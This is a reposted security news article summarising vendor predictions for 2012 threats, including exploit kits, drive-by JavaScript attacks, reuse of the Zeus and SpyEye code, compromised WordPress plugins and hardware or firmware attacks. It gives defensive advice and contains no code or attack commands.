Automated toolkits with business models that include rental agreements and constant updates will
gain considerable improvements in 2012, with many attack kits being primed with new features that
enable even the least tech-savvy cybercriminals to hone malware
in 2012 for highly targeted attacks.
It all starts with a blob of
heavily obfuscated Javascript and ends within a few minutes with the victim’s PC pwned and the victim’s
passwords in the hands of some Asian or eastern European goon squad.Andrew Brandt, director of Threat Research at
Solera
Financial malware designed to target and infiltrate bank accounts could be recoded for targeted
non-financial attacks, according to Boston-based security vendor Trusteer. The Zeus and SpyEye
codebases, which are now publicly available, can be manipulated to pull off more sophisticated
targeted attacks against enterprises. “Over the next twelve months perimeters will face an
onslaught from various sources, viruses going financial, APT-style technologies in Zeus code
derivatives manipulated by new coders and in other commercially available malware kits,” Trusteer
CTO Amit Klein noted in the company’s list of predictions.
A scourge of compromised legitimate websites will continue to fuel an increase in staged attacks
in 2012, according to South Jordan, Utah-based network security vendor, Solera Networks Inc.
High-profile attacks carried out by hactivist groups demonstrated that even the largest
enterprisesstruggle
to control website vulnerabilities that can give cybercriminals a way into sensitive systems.
Andrew Brandt, Solera’s director of Threat Research, urges Mozilla Firefox users to keep their
plug-ins updated and install NoScript to stop the onslaught of drive-by
attacks using malicious JavaScript.
“As far as I can tell, it’s the only surefire method of preventing an accidental infection of a
Windows PC by exploit-kitted webpages,” Brandt wrote in the Solera blog. “It all starts with a blob
of heavily obfuscated Javascript and ends within a few minutes with the victim’s PC pwned
and the victim’s passwords in the hands of some Asian or eastern European goon squad.”
Solera’s Brandt also points to vulnerable WordPress.org blog plug-ins as a major contributor to
the problem. Malware writers upload their code to the vulnerable webpages, enabling them to serve
up keyloggers to blog visitors. “Most of the code we’ve seen uploaded to legit sites redirects the
browser into the maw of one or another exploit kits,” Brandt wrote.
Hardware security weaknesses
Meanwhile, security giant McAfee, which was acquired
in 2010 by chipmaker Intel, is predicting a spike in attacks that leverage embedded hardware or
use a computer’s master boot record and BIOS layers, to bypass traditional security technologies.
“We expect to see more effort put into hardware and firmware exploits and their related real-world
attacks throughout 2012 and beyond,” according to McAfee.
Embedded systems that run GPS routers, ATM machines, medical devices and other systems can be
rooted and are at risk to falling under the control of sophisticated cybercriminals, according to
McAfee’s “2012
Threats Predictions” (.pdf) report.
“Controlling hardware is the promised land of sophisticated attackers,” according to the report.
“If attackers can insert code that alters the boot order or loading order of the operating system,
they will gain greater control and can maintain long-term access to the system and its data.”
McAfee’s prediction is somewhat buoyed by Columbia University researchers who demonstrated how
HP
printer vulnerabilities could be used by cybercriminals to gain access to corporate
networks.
Michael Sutton, vice president of security research at SaaS-based email and Web gateway security
vendor Zscaler Inc. said the focus on hardware-based
threats may force hardware vendors to increase their focus on security and take vulnerability
disclosure more seriously. Sutton’s presentation at Black Hat 2011 focused on weaknesses in
embedded Web servers.
“Security in the hardware space is at least ten years behind security in the software industry,”
Sutton wrote in Zscaler’s ThreatLabZ blog. “Hardware vendors will get a wake-up call as researchers
shift their efforts to hardware and party like it’s 1999.”
Article source: http://searchsecurity.techtarget.com/news/2240113180/Multifunctional-malware-staged-drive-by-attacks-to-rise-in-2012
View full post on National Cyber Security » Virus/Malware/Worms
